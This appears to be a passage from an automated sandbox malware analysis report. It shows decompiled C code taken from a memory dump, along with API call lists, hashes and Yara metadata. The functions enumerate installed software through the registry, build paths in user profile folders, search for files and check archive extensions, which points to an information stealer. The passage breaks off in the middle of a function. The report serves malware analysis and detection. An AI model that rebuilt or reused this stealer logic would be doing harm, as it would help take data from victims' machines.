									lstrcatA( *0x446250,  *0x446100);
									lstrcatA( *0x446250,  *(_t109 - 0x140));
									lstrcatA( *0x446250, _t108);
									lstrcatA( *0x446250,  *0x445c48);
									lstrcatA( *0x446250, _t105);
									lstrcatA( *0x446250, _t108);
									lstrcatA( *0x446250,  *0x4460c4);
									_t81 =  *(_t109 - 0x134);
									if( *((intOrPtr*)(_t109 - 0x120)) < 0x10) {
										_t81 = _t109 - 0x134;
									}
									lstrcatA( *0x446250, _t81);
									lstrcatA( *0x446250, "\n\n");
								} else {
									_push(0x43c8d8);
									_push(_t105);
									if( *0x446458() != 0) {
										goto L8;
									}
								}
								 *(_t109 - 4) =  *(_t109 - 4) | 0xffffffff;
								E00404354(_t109 - 0x134, 1, 0);
								_push( *((intOrPtr*)(_t109 - 0x138)));
							} while ( *0x446218() == 0x64);
						}
					}
					 *0x44621c( *((intOrPtr*)(_t109 - 0x138)));
					 *0x44624c( *((intOrPtr*)(_t109 - 0x13c)));
				}
				DeleteFileA(_t109 - 0x118);
				return E00420888(_t87, _t105, _t108);
			}




















                                                                    0x0040e9b8
                                                                    0x0040e9b8
                                                                    0x0040e9b8
                                                                    0x0040e9c2
                                                                    0x0040e9ca
                                                                    0x0040e9d8
                                                                    0x0040e9e7
                                                                    0x0040e9e9
                                                                    0x0040e9ee
                                                                    0x0040e9fe
                                                                    0x0040ea06
                                                                    0x0040ea14
                                                                    0x0040ea24
                                                                    0x0040ea2a
                                                                    0x0040ea3e
                                                                    0x0040ea48
                                                                    0x0040ea5f
                                                                    0x0040ea65
                                                                    0x0040ea6a
                                                                    0x0040ea76
                                                                    0x0040ea7d
                                                                    0x0040ea80
                                                                    0x0040ea86
                                                                    0x0040ea8b
                                                                    0x0040ea93
                                                                    0x0040eaa1
                                                                    0x0040eaa7
                                                                    0x0040eaad
                                                                    0x0040eab3
                                                                    0x0040eace
                                                                    0x0040eade
                                                                    0x0040eae4
                                                                    0x0040eaeb
                                                                    0x0040eaf6
                                                                    0x0040eafc
                                                                    0x0040eafe
                                                                    0x0040eafe
                                                                    0x0040eb00
                                                                    0x0040eb05
                                                                    0x0040eb06
                                                                    0x0040eb0f
                                                                    0x0040eb21
                                                                    0x0040eb28
                                                                    0x0040eb3a
                                                                    0x0040eb4c
                                                                    0x0040eb59
                                                                    0x0040eb6b
                                                                    0x0040eb7d
                                                                    0x0040eb8a
                                                                    0x0040eb9c
                                                                    0x0040eba9
                                                                    0x0040ebb6
                                                                    0x0040ebc8
                                                                    0x0040ebd5
                                                                    0x0040ebdb
                                                                    0x0040ebdd
                                                                    0x0040ebdd
                                                                    0x0040ebea
                                                                    0x0040ebfb
                                                                    0x0040eb11
                                                                    0x0040eb11
                                                                    0x0040eb12
                                                                    0x0040eb1b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040eb1b
                                                                    0x0040ec01
                                                                    0x0040ec0f
                                                                    0x0040ec14
                                                                    0x0040ec21
                                                                    0x0040ea8b
                                                                    0x0040ea80
                                                                    0x0040ec30
                                                                    0x0040ec3d
                                                                    0x0040ec43
                                                                    0x0040ec4b
                                                                    0x0040ec56

                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 0040E9C2
                                                                    • _memset.LIBCMT ref: 0040E9E9
                                                                    • lstrcatA.KERNEL32(?,?,?,?), ref: 0040E9FE
                                                                      • Part of subcall function 00415EF6: _malloc.LIBCMT ref: 00415EFC
                                                                      • Part of subcall function 00415EF6: GetTickCount.KERNEL32 ref: 00415F07
                                                                      • Part of subcall function 00415EF6: _rand.LIBCMT ref: 00415F1C
                                                                      • Part of subcall function 00415EF6: wsprintfA.USER32 ref: 00415F2F
                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040EA14
                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 0040EA24
                                                                    • DeleteFileA.KERNEL32(?,00000001), ref: 0040EC4B
                                                                      • Part of subcall function 0040E874: __EH_prolog3_GS.LIBCMT ref: 0040E87B
                                                                      • Part of subcall function 0040E874: _memset.LIBCMT ref: 0040E8C9
                                                                      • Part of subcall function 0040E874: LocalAlloc.KERNEL32 ref: 0040E904
                                                                    • StrCmpCA.SHLWAPI(?,0043C8D8), ref: 0040EB07
                                                                    • StrCmpCA.SHLWAPI(00000000,0043C8D8), ref: 0040EB13
                                                                    • lstrcatA.KERNEL32(0043C8DC), ref: 0040EB28
                                                                    • lstrcatA.KERNEL32 ref: 0040EB3A
                                                                    • lstrcatA.KERNEL32(?), ref: 0040EB4C
                                                                    • lstrcatA.KERNEL32(0043C8DC), ref: 0040EB59
                                                                    • lstrcatA.KERNEL32 ref: 0040EB6B
                                                                    • lstrcatA.KERNEL32(?), ref: 0040EB7D
                                                                    • lstrcatA.KERNEL32(0043C8DC), ref: 0040EB8A
                                                                    • lstrcatA.KERNEL32 ref: 0040EB9C
                                                                    • lstrcatA.KERNEL32(00000000), ref: 0040EBA9
                                                                    • lstrcatA.KERNEL32(0043C8DC), ref: 0040EBB6
                                                                    • lstrcatA.KERNEL32 ref: 0040EBC8
                                                                    • lstrcatA.KERNEL32(?), ref: 0040EBEA
                                                                    • lstrcatA.KERNEL32(0043EC3C), ref: 0040EBFB
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$FileH_prolog3__memset$AllocCopyCountDeleteLocalTick_malloc_randwsprintf
                                                                    • String ID:
                                                                    • API String ID: 716014776-0
                                                                    • Opcode ID: 6f702660455b9da2d7edd8238bb6ec62255fd2c8991bb1a738964050cfd8bb74
                                                                    • Instruction ID: 3aa7885677a8f14d255b573e5d65b01072271cfaaefee0be4d254fd4dcdea25c
                                                                    • Opcode Fuzzy Hash: 6f702660455b9da2d7edd8238bb6ec62255fd2c8991bb1a738964050cfd8bb74
                                                                    • Instruction Fuzzy Hash: DA61173A500118AFDF216F60EC49ACEBB75FB0B321F1104B5F205A21B1DB759A94DF5A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00415007 Relevance: 31.6, APIs: 14, Strings: 4, Instructions: 123registrystringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 89%
                                                                    			E00415007() {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				long _t53;
				char* _t78;
				void* _t79;
				void* _t82;
				void* _t85;
				void* _t88;
				signed int _t89;
				void* _t91;
				void* _t92;

				_t89 = _t91 - 0xba0;
				_t92 = _t91 - 0xc20;
				_t45 =  *0x443674; // 0x393162b1
				 *(_t89 + 0xb9c) = _t45 ^ _t89;
				 *(_t89 - 0x70) =  *(_t89 + 0xba8);
				_t78 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall";
				 *(_t89 - 0x74) = 0;
				 *(_t89 - 0x6c) = 0;
				 *(_t89 - 0x7c) = 0xf003f;
				 *(_t89 - 0x68) = 0;
				if(RegOpenKeyExA(0x80000002, _t78, 0, 0x20019, _t89 - 0x74) == 0) {
					 *(_t89 - 0x78) = 0;
					do {
						 *(_t89 - 0x68) = 0x400;
						_t53 = RegEnumKeyExA( *(_t89 - 0x74),  *(_t89 - 0x78), _t89 + 0x39c, _t89 - 0x68, 0, 0, 0, 0);
						 *(_t89 - 0x80) = _t53;
						if(_t53 != 0) {
							goto L9;
						} else {
							wsprintfA(_t89 - 0x64, "%s\\%s", _t78, _t89 + 0x39c);
							_t92 = _t92 + 0x10;
							if(RegOpenKeyExA(0x80000002, _t89 - 0x64, 0, 0x20019, _t89 - 0x6c) != 0) {
								RegCloseKey( *(_t89 - 0x6c));
							} else {
								 *(_t89 - 0x68) = 0x400;
								if(RegQueryValueExA( *(_t89 - 0x6c), "DisplayName", 0, _t89 - 0x7c, _t89 + 0x79c, _t89 - 0x68) == 0) {
									lstrcatA( *(_t89 - 0x70), _t89 + 0x79c);
									 *(_t89 - 0x68) = 0x400;
									if(RegQueryValueExA( *(_t89 - 0x6c), "DisplayVersion", 0, _t89 - 0x7c, _t89 + 0x79c, _t89 - 0x68) == 0) {
										lstrcatA( *(_t89 - 0x70), " [");
										lstrcatA( *(_t89 - 0x70), _t89 + 0x79c);
										lstrcatA( *(_t89 - 0x70), "]");
									}
									lstrcatA( *(_t89 - 0x70), 0x43c8dc);
								}
								RegCloseKey( *(_t89 - 0x6c));
								goto L9;
							}
						}
						L12:
						_t49 = RegCloseKey( *(_t89 - 0x74));
						goto L13;
						L9:
						 *(_t89 - 0x78) =  *(_t89 - 0x78) + 1;
					} while ( *(_t89 - 0x80) == 0);
					goto L12;
				}
				L13:
				_pop(_t85);
				_pop(_t88);
				_pop(_t79);
				return E0041DA9B(_t49, _t79,  *(_t89 + 0xb9c) ^ _t89, _t82, _t85, _t88);
			}
















                                                                    0x00415008
                                                                    0x0041500f
                                                                    0x00415015
                                                                    0x0041501c
                                                                    0x0041502b
                                                                    0x0041503a
                                                                    0x00415046
                                                                    0x00415049
                                                                    0x0041504c
                                                                    0x00415053
                                                                    0x0041505e
                                                                    0x00415064
                                                                    0x00415067
                                                                    0x00415079
                                                                    0x00415083
                                                                    0x00415089
                                                                    0x0041508e
                                                                    0x00000000
                                                                    0x00415094
                                                                    0x004150a5
                                                                    0x004150ab
                                                                    0x004150c5
                                                                    0x00415181
                                                                    0x004150cb
                                                                    0x004150e3
                                                                    0x004150f2
                                                                    0x004150fe
                                                                    0x0041511c
                                                                    0x0041512b
                                                                    0x00415135
                                                                    0x00415145
                                                                    0x00415153
                                                                    0x00415153
                                                                    0x00415161
                                                                    0x00415161
                                                                    0x0041516a
                                                                    0x00000000
                                                                    0x0041516a
                                                                    0x004150c5
                                                                    0x00415187
                                                                    0x0041518a
                                                                    0x00000000
                                                                    0x00415170
                                                                    0x00415170
                                                                    0x00415173
                                                                    0x00000000
                                                                    0x0041517c
                                                                    0x00415190
                                                                    0x00415196
                                                                    0x00415197
                                                                    0x0041519a
                                                                    0x004151a7

                                                                    APIs
                                                                    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?,0043C8DC,?,00000000), ref: 00415056
                                                                    • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00415083
                                                                    • wsprintfA.USER32 ref: 004150A5
                                                                    • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?), ref: 004150BD
                                                                    • RegQueryValueExA.ADVAPI32(?,DisplayName,00000000,?,?,?), ref: 004150EA
                                                                    • lstrcatA.KERNEL32(?,?), ref: 004150FE
                                                                    • RegQueryValueExA.ADVAPI32(?,DisplayVersion,00000000,?,?,?), ref: 00415123
                                                                    • lstrcatA.KERNEL32(?,0043EC94), ref: 00415135
                                                                    • lstrcatA.KERNEL32(?,?), ref: 00415145
                                                                    • lstrcatA.KERNEL32(?,0043F4A8), ref: 00415153
                                                                    • lstrcatA.KERNEL32(?,0043C8DC), ref: 00415161
                                                                    • RegCloseKey.ADVAPI32(?), ref: 0041516A
                                                                    • RegCloseKey.ADVAPI32(?), ref: 00415181
                                                                    • RegCloseKey.ADVAPI32(?), ref: 0041518A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$Close$OpenQueryValue$Enumwsprintf
                                                                    • String ID: %s\%s$DisplayName$DisplayVersion$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                                                                    • API String ID: 3722822016-3586320934
                                                                    • Opcode ID: 9fbb039184e97521e8e828ad7f7da5722b8a951149cd7d3fda9fdd26618aaa95
                                                                    • Instruction ID: 4836f0a002d8e5bdaed51ab035c3ea5cb6412ae6d96fa9fe31ca74597ecb6960
                                                                    • Opcode Fuzzy Hash: 9fbb039184e97521e8e828ad7f7da5722b8a951149cd7d3fda9fdd26618aaa95
                                                                    • Instruction Fuzzy Hash: 78412475900218AFDB229FA1DC48ADEBFBCEF1A715F20402AF909E7111D7745A48CF69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00412D3C Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 162stringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 79%
                                                                    			E00412D3C(void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				CHAR* _t82;
				intOrPtr* _t96;
				WCHAR* _t102;
				signed char _t103;
				intOrPtr _t120;
				intOrPtr _t127;
				CHAR* _t129;
				void* _t135;
				intOrPtr _t137;
				void* _t140;

				_t127 = __edx;
				_push(0x370);
				E0042083E(E00434D9B, __ebx, __edi, __esi);
				_t129 =  *0x445fb4; // 0x4c9a4c8
				 *((intOrPtr*)(_t140 - 0x378)) =  *((intOrPtr*)(_t140 + 8));
				 *((intOrPtr*)(_t140 - 0x374)) =  *((intOrPtr*)(_t140 + 0xc));
				_t117 = 0;
				 *(_t140 - 0x364) =  *(_t140 + 0x10);
				 *((intOrPtr*)(_t140 - 0x36c)) = 0;
				 *((intOrPtr*)(_t140 - 0x368)) = 0;
				E00426300(_t140 - 0x220, 0, 0x104);
				_t10 = _t140 - 0x328; // 0x41343d
				E00426300(_t10, 0, 0x104);
				lstrcatA(_t140 - 0x220, E00416617(0, _t129, 0x104, 0x1a));
				lstrcatA(_t140 - 0x220, _t129);
				lstrcatA(_t140 - 0x220,  *(_t140 - 0x364));
				_push( *0x445fe4);
				 *(_t140 - 0x370) = 0;
				_push( *(_t140 - 0x364));
				if( *0x446458() == 0) {
					 *(_t140 - 0x370) = 1;
				}
				_push( *0x445ae4);
				_push( *(_t140 - 0x364));
				if( *0x446458() == 0) {
					 *(_t140 - 0x370) = 2;
				}
				_t82 = E00416617(_t117, _t129, 0x104, 0x1a);
				_t20 = _t140 - 0x328; // 0x41343d
				lstrcatA(_t20, _t82);
				_t21 = _t140 - 0x328; // 0x41343d
				lstrcatA(_t21, _t129);
				E00426300(_t140 - 0x118, _t117, 0x104);
				lstrcatA(_t140 - 0x118, _t140 - 0x220);
				lstrcatA(_t140 - 0x118, 0x43c8e0);
				lstrcatA(_t140 - 0x118,  *0x445cec);
				_t96 = _t140 - 0x118;
				 *((intOrPtr*)(_t140 - 0x330)) = 0xf;
				 *(_t140 - 0x334) = _t117;
				 *(_t140 - 0x344) = _t117;
				_t135 = _t96 + 1;
				do {
					_t120 =  *_t96;
					_t96 = _t96 + 1;
					_t148 = _t120 - _t117;
				} while (_t120 != _t117);
				E00404396(_t140 - 0x344, _t148, _t140 - 0x118, _t96 - _t135);
				 *(_t140 - 4) = _t117;
				_t102 = E004160E8(_t140 - 0x344, _t140 - 0x360);
				if(_t102[0xa] >= 8) {
					_t102 =  *_t102;
				}
				_t103 = GetFileAttributesW(_t102);
				if(_t103 == 0xffffffff) {
					L10:
					 *(_t140 - 0x364) = _t117;
					goto L11;
				} else {
					 *(_t140 - 0x364) = 1;
					if((_t103 & 0x00000010) == 0) {
						L11:
						_t136 = _t140 - 0x360;
						E0040C148(0, _t140 - 0x360, 1);
						 *(_t140 - 4) =  *(_t140 - 4) | 0xffffffff;
						E00404354(_t140 - 0x344, 1, _t117);
						_t152 =  *(_t140 - 0x364) - _t117;
						if( *(_t140 - 0x364) != _t117) {
							_push(_t140 - 0x368);
							_push(_t140 - 0x118);
							if(E0040E6CB(_t117, _t140 - 0x36c, 0, _t136, _t152) == 0) {
								E0040E631(_t140 - 0x36c, _t140 - 0x368);
							}
						}
						_t137 =  *((intOrPtr*)(_t140 - 0x378));
						E004101E9(_t137, _t127, 0x43c8d8, _t140 - 0x220,  *((intOrPtr*)(_t140 - 0x374)),  *((intOrPtr*)(_t140 - 0x36c)),  *((intOrPtr*)(_t140 - 0x368)),  *((intOrPtr*)(_t137 + 0x20)));
						if( *((intOrPtr*)(_t137 + 6)) != _t117) {
							_t117 =  *(_t140 - 0x370);
							_t61 = _t140 - 0x328; // 0x41343d
							E00412592( *(_t140 - 0x370), _t137, _t61,  *((intOrPtr*)(_t140 - 0x374)));
						}
						E0040E631(_t140 - 0x36c, _t140 - 0x368);
						return E00420888(_t117, _t140 - 0x36c, _t140 - 0x368);
					}
					goto L10;
				}
			}













                                                                    0x00412d3c
                                                                    0x00412d3c
                                                                    0x00412d46
                                                                    0x00412d4e
                                                                    0x00412d54
                                                                    0x00412d5d
                                                                    0x00412d66
                                                                    0x00412d6e
                                                                    0x00412d7c
                                                                    0x00412d82
                                                                    0x00412d88
                                                                    0x00412d91
                                                                    0x00412d99
                                                                    0x00412db1
                                                                    0x00412dbf
                                                                    0x00412dd2
                                                                    0x00412dd8
                                                                    0x00412dde
                                                                    0x00412de4
                                                                    0x00412df2
                                                                    0x00412df4
                                                                    0x00412df4
                                                                    0x00412dfe
                                                                    0x00412e04
                                                                    0x00412e12
                                                                    0x00412e14
                                                                    0x00412e14
                                                                    0x00412e20
                                                                    0x00412e27
                                                                    0x00412e2e
                                                                    0x00412e35
                                                                    0x00412e3c
                                                                    0x00412e4b
                                                                    0x00412e61
                                                                    0x00412e73
                                                                    0x00412e86
                                                                    0x00412e8c
                                                                    0x00412e92
                                                                    0x00412e9c
                                                                    0x00412ea2
                                                                    0x00412ea8
                                                                    0x00412eab
                                                                    0x00412eab
                                                                    0x00412ead
                                                                    0x00412eae
                                                                    0x00412eae
                                                                    0x00412ec2
                                                                    0x00412ed4
                                                                    0x00412ed7
                                                                    0x00412ee0
                                                                    0x00412ee2
                                                                    0x00412ee2
                                                                    0x00412ee5
                                                                    0x00412eee
                                                                    0x00412efe
                                                                    0x00412efe
                                                                    0x00000000
                                                                    0x00412ef0
                                                                    0x00412ef0
                                                                    0x00412efc
                                                                    0x00412f04
                                                                    0x00412f08
                                                                    0x00412f0e
                                                                    0x00412f13
                                                                    0x00412f20
                                                                    0x00412f25
                                                                    0x00412f2b
                                                                    0x00412f33
                                                                    0x00412f3a
                                                                    0x00412f4a
                                                                    0x00412f58
                                                                    0x00412f58
                                                                    0x00412f4a
                                                                    0x00412f5d
                                                                    0x00412f86
                                                                    0x00412f8e
                                                                    0x00412f96
                                                                    0x00412f9c
                                                                    0x00412fa4
                                                                    0x00412fa4
                                                                    0x00412fb5
                                                                    0x00412fbf
                                                                    0x00412fbf
                                                                    0x00000000
                                                                    0x00412efc

                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 00412D46
                                                                    • _memset.LIBCMT ref: 00412D88
                                                                    • _memset.LIBCMT ref: 00412D99
                                                                      • Part of subcall function 00416617: _memset.LIBCMT ref: 00416638
                                                                      • Part of subcall function 00416617: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00416650
                                                                    • lstrcatA.KERNEL32(?,00000000,?,?,?,00000370,0041343D,?), ref: 00412DB1
                                                                    • lstrcatA.KERNEL32(?,04C9A4C8,?,?,?,00000370,0041343D,?), ref: 00412DBF
                                                                    • lstrcatA.KERNEL32(?,?,?,?,?,00000370,0041343D,?), ref: 00412DD2
                                                                    • StrCmpCA.SHLWAPI(?,?,?,?,00000370,0041343D,?), ref: 00412DEA
                                                                    • StrCmpCA.SHLWAPI(?,?,?,?,00000370,0041343D,?), ref: 00412E0A
                                                                    • lstrcatA.KERNEL32(=4A,00000000,?,?,?,00000370,0041343D,?), ref: 00412E2E
                                                                    • lstrcatA.KERNEL32(=4A,04C9A4C8,?,?,?,00000370,0041343D,?), ref: 00412E3C
                                                                    • _memset.LIBCMT ref: 00412E4B
                                                                    • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,00000370,0041343D,?), ref: 00412E61
                                                                    • lstrcatA.KERNEL32(?,0043C8E0,?,?,?,?,?,?,00000370,0041343D,?), ref: 00412E73
                                                                    • lstrcatA.KERNEL32(?,?,?,?,?,?,?,00000370,0041343D,?), ref: 00412E86
                                                                    • GetFileAttributesW.KERNEL32(00000000,?,?,?), ref: 00412EE5
                                                                      • Part of subcall function 004101E9: wsprintfA.USER32 ref: 0041023C
                                                                      • Part of subcall function 004101E9: FindFirstFileA.KERNEL32(?,?), ref: 00410253
                                                                      • Part of subcall function 004101E9: StrCmpCA.SHLWAPI(?,0043EAC4), ref: 00410274
                                                                      • Part of subcall function 004101E9: StrCmpCA.SHLWAPI(?,0043EAC8), ref: 0041028E
                                                                      • Part of subcall function 004101E9: _sprintf.LIBCMT ref: 004102B5
                                                                      • Part of subcall function 004101E9: _memset.LIBCMT ref: 004102C8
                                                                      • Part of subcall function 004101E9: wsprintfA.USER32 ref: 004102F5
                                                                      • Part of subcall function 004101E9: StrCmpCA.SHLWAPI(?), ref: 0041030B
                                                                      • Part of subcall function 004101E9: FindNextFileA.KERNEL32(?,?), ref: 00410464
                                                                      • Part of subcall function 004101E9: FindClose.KERNEL32(?), ref: 00410478
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$_memset$FileFind$wsprintf$AttributesCloseFirstFolderH_prolog3_NextPath_sprintf
                                                                    • String ID: =4A
                                                                    • API String ID: 3931264267-1761815840
                                                                    • Opcode ID: 341711c0663573575b39ff4fe592647bdc371ab5b212e61f26e4495dfcfb2b1d
                                                                    • Instruction ID: bf2c21162eb632bb24620d173699f0e895dff840e7ab81d2a77476ccfc7dd78c
                                                                    • Opcode Fuzzy Hash: 341711c0663573575b39ff4fe592647bdc371ab5b212e61f26e4495dfcfb2b1d
                                                                    • Instruction Fuzzy Hash: 1A611DB2900228AFDF229F60DD89ADAB77CBB09314F0141EAE509A7151DB35ABC5CF54
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0041BC80 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 63stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrlen.KERNEL32(?,00000000,0041C7C8,?,00000000,00000104,00000000), ref: 0041BC82
                                                                    • StrCmpCA.SHLWAPI(00000000,0043F6D4), ref: 0041BCAA
                                                                    • StrCmpCA.SHLWAPI(00000000,.zip), ref: 0041BCBE
                                                                    • StrCmpCA.SHLWAPI(00000000,.zoo), ref: 0041BCCE
                                                                    • StrCmpCA.SHLWAPI(00000000,.arc), ref: 0041BCDE
                                                                    • StrCmpCA.SHLWAPI(00000000,.lzh), ref: 0041BCEE
                                                                    • StrCmpCA.SHLWAPI(00000000,.arj), ref: 0041BCFE
                                                                    • StrCmpCA.SHLWAPI(00000000,.gz), ref: 0041BD0E
                                                                    • StrCmpCA.SHLWAPI(00000000,.tgz), ref: 0041BD1E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrlen
                                                                    • String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
                                                                    • API String ID: 1659193697-51310709
                                                                    • Opcode ID: 67047d830c93c9611e09db2a4372ce4903fc30a4613be9600f17df625a583e12
                                                                    • Instruction ID: baa9e529bd40b5a6ed41b3c390d9594be1d0be8f3d5b79f03cfdf6aff9987c72
                                                                    • Opcode Fuzzy Hash: 67047d830c93c9611e09db2a4372ce4903fc30a4613be9600f17df625a583e12
                                                                    • Instruction Fuzzy Hash: CD1182346856612A9F211F206E4AFDF6754DF03B91B19102BF401A12A0EF5C98C797EE
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040878A Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 236stringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 85%
                                                                    			E0040878A(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char* _t93;
				char* _t94;
				intOrPtr* _t107;
				WCHAR* _t113;
				signed char _t114;
				void* _t121;
				char* _t127;
				char _t137;
				char* _t139;
				CHAR* _t140;
				CHAR* _t147;
				CHAR* _t151;
				char _t154;
				void* _t158;
				intOrPtr _t160;
				void* _t170;
				void* _t175;
				void* _t184;
				void* _t192;
				CHAR* _t197;
				void* _t198;

				_push(0x7cc);
				E0042083E(E0043482B, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t198 - 0x7d8)) =  *((intOrPtr*)(_t198 + 8));
				_t158 = 0x104;
				 *(_t198 - 0x7d4) =  *(_t198 + 0xc);
				_t184 = 0x104;
				_t93 = _t198 - 0x224;
				do {
					 *_t93 = 0;
					_t93 = _t93 + 1;
					_t184 = _t184 - 1;
				} while (_t184 != 0);
				_t94 = _t198 - 0x11c;
				do {
					 *_t94 = 0;
					_t94 = _t94 + 1;
					_t158 = _t158 - 1;
				} while (_t158 != 0);
				_t154 = 0;
				 *((intOrPtr*)(_t198 - 0x7c4)) = 0;
				 *((intOrPtr*)(_t198 - 0x7c0)) = 0;
				lstrcatA(_t198 - 0x224, E00416617(0, __edi, __esi, 0x1a));
				lstrcatA(_t198 - 0x224,  *0x445d44);
				lstrcatA(_t198 - 0x11c, _t198 - 0x224);
				lstrcatA(_t198 - 0x11c, 0x43c8e0);
				lstrcatA(_t198 - 0x11c,  *0x445cec);
				_t107 = _t198 - 0x11c;
				 *((intOrPtr*)(_t198 - 0x738)) = 0xf;
				 *((intOrPtr*)(_t198 - 0x73c)) = 0;
				 *((char*)(_t198 - 0x74c)) = 0;
				_t192 = _t107 + 1;
				do {
					_t160 =  *_t107;
					_t107 = _t107 + 1;
					_t203 = _t160;
				} while (_t160 != 0);
				E00404396(_t198 - 0x74c, _t203, _t198 - 0x11c, _t107 - _t192);
				 *(_t198 - 4) = 0;
				_t113 = E004160E8(_t198 - 0x74c, _t198 - 0x7bc);
				if(_t113[0xa] >= 8) {
					_t113 =  *_t113;
				}
				_t114 = GetFileAttributesW(_t113);
				if(_t114 == 0xffffffff) {
					L10:
					 *((intOrPtr*)(_t198 - 0x7c8)) = _t154;
				} else {
					 *((intOrPtr*)(_t198 - 0x7c8)) = 1;
					if((_t114 & 0x00000010) != 0) {
						goto L10;
					}
				}
				E0040C148(0, _t198 - 0x7bc, 1);
				 *(_t198 - 4) =  *(_t198 - 4) | 0xffffffff;
				E00404354(_t198 - 0x74c, 1, _t154);
				_t207 =  *((intOrPtr*)(_t198 - 0x7c8)) - _t154;
				if( *((intOrPtr*)(_t198 - 0x7c8)) != _t154) {
					_push(_t198 - 0x7c0);
					_push(_t198 - 0x11c);
					_t121 = E0040E6CB(_t154, _t198 - 0x7c4, 0, 1, _t207);
					_t208 = _t121;
					if(_t121 != 0) {
						 *((intOrPtr*)(_t198 - 0x754)) = 0xf;
						 *((intOrPtr*)(_t198 - 0x758)) = _t154;
						 *((char*)(_t198 - 0x768)) = _t154;
						E00404331(_t198 - 0x768,  *((intOrPtr*)(_t198 - 0x7d8)));
						_push(_t198 - 0x768);
						_push(_t198 - 0x730);
						 *(_t198 - 4) = 1;
						E00415D13(_t154, _t198 - 0x768, 0, 1, _t208);
						 *(_t198 - 4) = 3;
						E00404354(_t198 - 0x768, 1, _t154);
						_t170 = 0x104;
						_t127 = _t198 - 0x32c;
						do {
							 *_t127 = _t154;
							_t127 = _t127 + 1;
							_t170 = _t170 - 1;
						} while (_t170 != 0);
						lstrcatA(_t198 - 0x32c,  *0x445a84);
						if(E0040C00F(_t198 - 0x730, _t198 - 0x32c, _t154) != 0xffffffff) {
							E0040453E(_t198 - 0x730, _t154, _t132 + 0xc);
							_t173 = _t198 - 0x730;
							E0040453E(_t198 - 0x730, 0x78, 0xffffffff);
							_t137 =  *(_t198 - 0x730);
							if( *((intOrPtr*)(_t198 - 0x71c)) < 0x10) {
								_t137 = _t198 - 0x730;
							}
							_t190 = _t198 - 0x7cc;
							if(E0040E575(_t198 - 0x7d0, _t173, _t198 - 0x7cc, _t137) != 0) {
								_t175 = 0x3e8;
								_t139 = _t198 - 0x714;
								do {
									 *_t139 = 0;
									_t139 = _t139 + 1;
									_t175 = _t175 - 1;
									_t213 = _t175;
								} while (_t175 != 0);
								_push( *((intOrPtr*)(_t198 - 0x7c4)));
								_push( *((intOrPtr*)(_t198 - 0x7cc)));
								_t140 = E0040E874(_t198 - 0x784,  *((intOrPtr*)(_t198 - 0x7c0)),  *((intOrPtr*)(_t198 - 0x7d0)), _t190, 1, _t213);
								 *(_t198 - 4) = 4;
								if(_t140[0x14] >= 0x10) {
									_t140 =  *_t140;
								}
								lstrcatA(_t198 - 0x714, _t140);
								 *(_t198 - 4) = 3;
								E00404354(_t198 - 0x784, 1, 0);
								_t197 =  *(_t198 - 0x7d4);
								lstrcatA(_t197,  *0x445e80);
								_push("NULL");
								_push(_t198 - 0x714);
								if( *0x446458() != 0) {
									_push( *((intOrPtr*)(_t198 - 0x7c4)));
									_push( *((intOrPtr*)(_t198 - 0x7cc)));
									_t147 = E0040E874(_t198 - 0x7a0,  *((intOrPtr*)(_t198 - 0x7c0)),  *((intOrPtr*)(_t198 - 0x7d0)), _t190, _t197, __eflags);
									 *(_t198 - 4) = 5;
